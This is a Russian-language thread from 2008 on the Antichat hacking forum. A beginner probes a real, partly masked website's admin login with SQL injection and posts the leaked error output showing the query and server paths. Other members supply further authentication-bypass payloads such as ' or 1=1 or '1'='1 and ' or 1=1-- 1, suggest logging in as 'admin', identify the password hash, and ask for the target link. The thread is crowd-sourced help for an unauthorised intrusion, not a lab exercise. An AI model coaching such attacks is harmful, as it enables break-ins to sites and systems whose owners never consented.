ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимосьть при авторизации
  #1  
Старый 21.12.2008, 23:39
Аватар для Tigerrr
Tigerrr
Новичок
Регистрация: 19.12.2008
Сообщений: 6
Провел на форуме:
27915

Репутация: 0
По умолчанию Уязвимосьть при авторизации

Привет всем.
Вот заинтересовался одним сайтом... быстренько подобрал адрес к админке ****.ru/admin/
(по всей видимости там cms joomla ...еси правильно ...ну или както так)
И передомной несколько полей: лог. , пас., и защитная строка.

В качестве лога ввожу ' or '1'=1' и любой пас...
Мне выдает

Код:
Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or '1'=1'' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/********.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*********/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/********.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/********.com/data/f/db.inc.php on line 43
Я как новенький в етом деле незнаю че мне делать дальше... подскажите плз
пасиба заранее
 
Ответить с цитированием

  #2  
Старый 21.12.2008, 23:43
Аватар для ntldr
ntldr
Постоянный
Регистрация: 04.12.2007
Сообщений: 424
Провел на форуме:
2364957

Репутация: 479
По умолчанию

' or '1'=1'/* попробуй
 
Ответить с цитированием

  #3  
Старый 21.12.2008, 23:44
Аватар для master01
master01
Познающий
Регистрация: 09.12.2008
Сообщений: 39
Провел на форуме:
172355

Репутация: 30
По умолчанию

Попробуй логин :admin (если не подойдёт, ищи как ник админа на сайте)
Код:
 pass='b59c67bf196a4758191e42f76670ceba'
пасс был зашифрован MD5 : 1111
Возможно попадёшь в админку.
 
Ответить с цитированием

  #4  
Старый 21.12.2008, 23:48
Аватар для Tigerrr
Tigerrr
Новичок
Регистрация: 19.12.2008
Сообщений: 6
Провел на форуме:
27915

Репутация: 0
По умолчанию

Этот пас я вводил когда в логе было ' or '1'=1'
 
Ответить с цитированием

  #5  
Старый 21.12.2008, 23:53
Аватар для Tigerrr
Tigerrr
Новичок
Регистрация: 19.12.2008
Сообщений: 6
Провел на форуме:
27915

Репутация: 0
По умолчанию

При вводе ' or '1'=1'/* почти тоже самое


Код:
Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms*****_admin.users WHERE login='' or '1'=1'/\*' AND pass='698d51a19d8a121ce581499d7b701668' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/*****.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*****.com/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/*****.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/*****.com/data/f/db.inc.php on line 43
 
Ответить с цитированием

  #6  
Старый 22.12.2008, 01:44
Аватар для Tigerrr
Tigerrr
Новичок
Регистрация: 19.12.2008
Сообщений: 6
Провел на форуме:
27915

Репутация: 0
По умолчанию

люди, посоветуйте чтото, плиз... я уже незнаю что делать(
 
Ответить с цитированием

  #7  
Старый 22.12.2008, 02:08
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Ты у меня ник сер, да))?
master01 вроде как все написал!
А если что то скинь мне Линк в личку.
 
Ответить с цитированием

  #8  
Старый 22.12.2008, 02:09
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Может линк выложишь?
Людям так проще будет...
 
Ответить с цитированием

  #9  
Старый 22.12.2008, 12:35
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

1. Для вопросов есть спец тема.
2. А почему ' or '1'=1'?
Попробуй: ' or 1=1 or '1'='1
Тогда запрос будет таким:

Код:
SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or 1=1 or '1'='1' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0;
т.е. условие выполнится.
Или попробуй: ' or 1=1-- 1
 
Ответить с цитированием

  #10  
Старый 22.12.2008, 12:40
Аватар для TAKO
TAKO
Banned
Регистрация: 17.12.2008
Сообщений: 9
Провел на форуме:
117291

Репутация: 3
По умолчанию

Это не джумла, определенно, судя по путям:
Цитата:
/usr/home/sites/*****.com/data/f/db.inc.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перехват Gsm пакетов SNIFF Сотовый фрикинг 16 27.12.2009 22:25
Команда исследователей из США представила новую технологию авторизации пользователей. Mobile Мировые новости 0 11.03.2006 12:33
Как «растянуть» аккумулятор novichok Сотовый фрикинг 4 28.02.2006 22:47
химия своими руками silveran Болталка 43 11.01.2006 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ